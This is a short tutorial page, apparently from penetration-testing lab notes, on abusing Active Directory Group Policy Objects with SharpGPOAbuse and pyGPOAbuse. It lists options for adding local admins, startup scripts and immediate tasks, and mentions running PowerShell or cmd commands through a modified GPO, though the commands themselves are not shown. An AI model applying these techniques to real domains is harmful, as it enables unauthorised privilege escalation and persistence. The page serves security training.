GPO Attacks
We discussed the theory behind GPOs here.
To abuse GPOs from windows we mainly use SharpGPOAbuse
Option | Description |
---|---|
--AddUserRights | Add rights to a user |
--AddLocalAdmin | Add a user to the local admins group |
--AddComputerScript | Add a new computer startup script |
--AddUserScript | Configure a user logon script |
--AddComputerTask | Configure a computer immediate task |
--AddUserTask | Add an immediate task to a user |
For example we can use AddLocalAdmin
to grant administrative access to a user
[!info]
--AddLocalAdmin
option will overwrite any existing Administrator if this policy is given higher priority. This could create problems if the Administrators or any other options are locally set on the machines, as they will be replaced. It is recommended to experiment with these changes in a controlled environment, such as this lab.
To abuse GPOs from Linux we use pyGPOAbuse.
Before we abuse this GPO, let's create a backup so we can restore it once we are done
Next we can modify the GPO: this tool allowed us to run PowerShell
or cmd
commands with the options -PowerShell
or -command
, respectively
Last updated